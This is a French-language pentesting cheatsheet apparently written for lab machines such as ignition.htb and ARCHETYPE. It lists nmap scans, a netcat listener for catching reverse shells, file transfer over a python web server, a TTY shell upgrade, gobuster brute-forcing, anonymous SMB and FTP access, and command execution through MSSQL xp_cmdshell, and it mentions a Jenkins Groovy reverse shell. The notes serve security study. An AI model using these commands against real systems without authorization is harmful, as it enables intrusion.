Skip to main content

Cheatsheet

Objectif

Afin de simplifier et de résumer les différentes phases de pentesting, j'écris dans cet article les commandes les plus utilisées. L'objectif pricipal est d'expliquer brièment la fonction de chaque commande, pour permettre leur utilisation récursive.

Nmap

nmap -sV -sC {IP-dest}

Dans ce lien, vous pouvez télécharger un bon PDF: Nmap cheatsheet

Commandes utiles

Écrire à la fin d'un document

echo "{dest-IP} ignition.htb" | sudo tee -a /etc/hosts

Créer un listener sur le port spécifié avec NETCAT pour recevoir des conexion externes.

nc -lvnp 8000

#-l : Mode écoute
#-v : Mode verboux. Montre plus de détails dans les messages
#-n : Adresses IP numériques uniquement, pas de résolution DNS
#-p : Port d'écoute

Créer un serveur http avec python et partage de fichiers

 # à partir du dossier où l'on veut partager les fichiers
python3 -m http.server 80

#pour accéder aux ficiers
wget http://host-IP/fichier -outfile fichier

Stablish a functional shell, sometimes it's important to set a TTY after the exploitation

python3 -c 'import pty;pty.spawn("/bin/bash")'

21 TCP FTP

ftp {target_IP} #Puis login avec anonymous

#help :Liste de commandes
#get :Telecharger des fichiers
#bye :sortir

Jenkins

Après avoir appris que vous pouvez exécuter des scropts Groovy dans Jenkins, vous accédez à l'un des sites Web énumérés ci-dessus et exécutez un reverse shell.

23 TCP Telnet

telnet {IP-dest}

80 TCP HTTP

Gobuster est un outil pour forcer avec bruteforce les répertoires, fichiers et sous-domaines DNS

gobuster dir -u http://10.129.33.133:80 -w /usr/share/wordlists/dirb/common.txt
gobuster dir -u http://10.129.1.15 dir -w /usr/share/wordlists/dirb/common.txt -x php,html

# -x :l'extension spécifiée est ajoutée à tous les mots contenus dans le dictionnaire -w.
# Pour connaître le bon format, vous pouvez utiliser le plugin Wappalyzer et voir quelles technologies sont utilisées
# -u :pour le répertoire
# -w :pour le dictionnaire
#Pour télécharger les listes les plus utilisées, <apt -y install seclists> et peut être trouvé dans /usr/share/seclists/

Pour obtenir plus d'informations sur une demande, vous pouvez utiliser cURL

curl -v http://{dest-IP}/

445 TCP SMB

smbclient -L \\\\{dest-IP}
# smbclient -L \\\\{dest-IP} -U 'administrator' #sans mot de passe
smbclient \\\\{dest-IP}\\{éléments partagés} #Appuyez sur entrée sans mot de passe
# smbclient \\\\{dest-IP}\\{éléments partagés} -U 'administrator'

# -L : Afficher les fichiers partagés
# -U : Nom d'utilisateur
# get : Lorsque vous accédez à smb, pour télécharger des fichiers

1433 TCP MSSQL

Utilisarion de Inpacket

python3 mssqlclient.py ARCHETYPE/sql_svc@{dest-IP} -windows-auth

Une fois à l'intérieur, xp_cmdshell est utilisé pour exécuter les commandes

SQL> xp_cmdshell "powershell -c whoami" # Exemple

3306 TCP Mysql

mysql -h {ip-dest} -u {user}

# mysql --help
# SHOW databases; : Imprime les bases de données auxquelles nous pouvons accéder.
# USE {database_name}; : Défini pour utiliser la base de données nommée {base de données}
# SHOW tables; : Imprime les tables disponible dans la base de données actuelle.
# SELECT * FROM {table_name}; : Imprime toutes les données de la table {table}

SQL Cheatsheet

3389 TCP RDP

xfreerdp /v:{dest-IP} /cert:ignore /u:Administrator